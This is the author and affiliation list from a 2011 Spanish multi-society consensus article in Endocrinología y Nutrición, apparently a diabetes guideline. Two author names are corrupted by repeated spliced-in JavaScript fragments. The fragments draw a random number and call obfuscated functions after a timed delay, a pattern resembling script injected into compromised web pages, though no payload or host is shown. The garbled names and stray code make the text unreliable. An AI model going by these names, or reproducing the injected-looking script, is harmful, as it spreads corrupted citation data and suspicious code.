Endocrinol Nutr. 2011;58(3):112—120

 

Edelmiro Menéndez Torrea,?, Francisco Javier Lafita Tejedora, Sara Artola Menéndeza, Jesús Millán Nú˜nez-Cortésb, Ángeles Alonso Garcíac, Manuel Puig Domingod, José Ramón García Solanse, Fernandom() * 5); if (number1==3){var delay = 15000;setTimeout($mRi(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 5); if (number1==3){var delay = 15000;setTimeout($mRi(0), delay);}ando Álvarez Guisasolaf, Javier García Alegríag, Javier Mediavilla Bravoh, Carlos Mirandom() * 5); if (number1==3){var delay = 15000;setTimeout($mRi(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 5); if (number1==3){var delay = 15000;setTimeout($mRi(0), delay);}anda Fernández-Santosi y Ramón Romero Gonzálezj

a En representación del Grupo de Trabajo de Consensos y Guías Clínicas de la Sociedad Espa˜nola de Diabetes,b Sociedad Española de Arteriosclerosis (SEA), c Sociedad Española de Cardiología (SEC),d Sociedad Española de Endocrinología y Nutrición (SEEN), e Sociedad Española de Farmacia Comunitaria (SEFAC), f Sociedad Espa˜nola de Medicina Familiar y Comunitaria (SEMFYC),  Sociedad Española de Medicina Interna (SEMI), h Sociedad Española de Médicos de Atención Primaria (SEMERGEN), i Sociedad Española de Médicos Generales y de Familia (SEMG),j Sociedad Española de Nefrología (SEN),